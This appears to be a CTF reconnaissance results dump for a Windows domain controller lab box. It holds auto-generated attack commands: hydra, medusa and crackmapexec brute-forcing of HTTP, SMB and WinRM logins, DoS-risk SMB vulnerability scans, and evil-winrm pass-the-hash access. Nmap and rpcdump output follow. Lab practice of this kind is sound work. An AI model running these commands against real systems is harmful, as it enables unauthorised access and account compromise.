medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt"
[*] msrpc on tcp/135
[-] RPC Client:
rpcclient -p 135 -U "" 10.129.243.131
[*] netbios-ssn on tcp/139
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/389
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt"
[*] microsoft-ds on tcp/445
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Lookup SIDs
impacket-lookupsid '[username]:[password]@10.129.243.131'
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/3268
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt"
[*] wsman on tcp/5985
[-] Bruteforce logins:
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
[-] Check login (requires credentials):
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '<username>' -p '<password>'
[-] Evil WinRM (gem install evil-winrm):
evil-winrm -u '<user>' -p '<password>' -i 10.129.243.131
evil-winrm -u '<user>' -H '<hash>' -i 10.129.243.131
[*] domain on udp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt
[*] domain on tcp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt"
[*] msrpc on tcp/135
[-] RPC Client:
rpcclient -p 135 -U "" 10.129.243.131
[*] netbios-ssn on tcp/139
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/389
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt"
[*] microsoft-ds on tcp/445
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Lookup SIDs
impacket-lookupsid '[username]:[password]@10.129.243.131'
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/3268
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt"
[*] wsman on tcp/5985
[-] Bruteforce logins:
crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
[-] Check login (requires credentials):
crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '<username>' -p '<password>'
[-] Evil WinRM (gem install evil-winrm):
evil-winrm -u '<user>' -p '<password>' -i 10.129.243.131
evil-winrm -u '<user>' -H '<hash>' -i 10.129.243.131
[*] msrpc on tcp/49667
[-] RPC Client:
rpcclient -p 49667 -U "" 10.129.243.131
[*] msrpc on tcp/49695
[-] RPC Client:
rpcclient -p 49695 -U "" 10.129.243.131
[*] msrpc on tcp/49843
[-] RPC Client:
rpcclient -p 49843 -U "" 10.129.243.131
[*] domain on udp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt

8
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log Normal file
View File

@@ -0,0 +1,8 @@
Identified Architecture: 64-bit
Identified HTTP Server: Microsoft-IIS/10.0
Identified Architecture: 64-bit
Identified HTTP Server: Microsoft-IIS/10.0

67
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,67 @@
# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131
Nmap scan report for megacorp.htb (10.129.243.131)
Host is up, received user-set (0.061s latency).
Scanned at 2023-10-28 14:23:46 CEST for 449s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Slandovia Energy
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFF13%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10A%TS=U)
OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 0s
| smb2-time:
| date: 2023-10-28T12:30:36
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25314/tcp): CLEAN (Timeout)
| Check 2 (port 10793/tcp): CLEAN (Timeout)
| Check 3 (port 25536/udp): CLEAN (Timeout)
| Check 4 (port 25523/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 74.01 ms 10.10.14.1
2 74.05 ms megacorp.htb (10.129.243.131)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:31:15 2023 -- 1 IP address (1 host up) scanned in 449.29 seconds

38
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt Normal file
View File

@@ -0,0 +1,38 @@
# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131
Nmap scan report for megacorp.htb (10.129.243.131)
Host is up, received user-set (0.055s latency).
Scanned at 2023-10-28 14:23:46 CEST for 1767s
Not shown: 97 open|filtered udp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/udp open domain udp-response (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z)
123/udp open ntp udp-response ttl 127 NTP v3
| ntp-info:
|_ receive time stamp: 2023-10-28T12:30:46
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFD6C%P=x86_64-pc-linux-gnu%r(NBT
SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAA\0\0!\0\x01");
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653D0439%P=x86_64-pc-linux-gnu)
U1(R=N)
IE(R=N)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14s
TRACEROUTE (using port 123/udp)
HOP RTT ADDRESS
1 44.38 ms 10.10.14.1
2 57.06 ms megacorp.htb (10.129.243.131)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:53:13 2023 -- 1 IP address (1 host up) scanned in 1767.23 seconds

6
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt Normal file
View File

@@ -0,0 +1,6 @@
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.129.243.131 is 64-bit

12
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt Normal file
View File

@@ -0,0 +1,12 @@
# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131
Nmap scan report for megacorp.htb (10.129.243.131)
Host is up, received user-set (0.62s latency).
Scanned at 2023-10-28 14:27:56 CEST for 23s
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:28:19 2023 -- 1 IP address (1 host up) scanned in 26.49 seconds

880
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt Normal file
View File

@@ -0,0 +1,880 @@
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Retrieving endpoint list from 10.129.243.131
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
ncacn_ip_tcp:10.129.243.131[49664]
ncalrpc:[WindowsShutdown]
ncacn_np:\\DC[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc089280]
Protocol: N/A
Provider: winlogon.exe
UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
ncalrpc:[WindowsShutdown]
ncacn_np:\\DC[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc089280]
ncalrpc:[WMsgKRpc08A621]
Protocol: N/A
Provider: N/A
UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0
Bindings:
ncalrpc:[csebpub]
ncalrpc:[LRPC-6b54d635557b62ca53]
ncalrpc:[LRPC-e71821bbfb97e6ac17]
ncalrpc:[LRPC-6b4af19739a6d01556]
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
ncalrpc:[LRPC-e71821bbfb97e6ac17]
ncalrpc:[LRPC-6b4af19739a6d01556]
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
ncalrpc:[LRPC-6b4af19739a6d01556]
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
ncalrpc:[LRPC-9e83194e1e5674c55f]
ncalrpc:[LRPC-a91e72435259adddfa]
Protocol: N/A
Provider: N/A
UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0
Bindings:
ncalrpc:[LRPC-6b54d635557b62ca53]
ncalrpc:[LRPC-e71821bbfb97e6ac17]
ncalrpc:[LRPC-6b4af19739a6d01556]
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0
Bindings:
ncalrpc:[LRPC-e71821bbfb97e6ac17]
ncalrpc:[LRPC-6b4af19739a6d01556]
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0
Bindings:
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0
Bindings:
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0
Bindings:
ncalrpc:[LRPC-baa5dfd3c285fa9f38]
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0
Bindings:
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0
Bindings:
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0
Bindings:
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0
Bindings:
ncalrpc:[LRPC-56be5249e855b3e1a2]
ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8]
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0
Bindings:
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0
Bindings:
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0
Bindings:
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0
Bindings:
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0
Bindings:
ncalrpc:[LRPC-b02c899b61b7b8f1c9]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0
Bindings:
ncalrpc:[umpo]
Protocol: N/A
Provider: sysntfy.dll
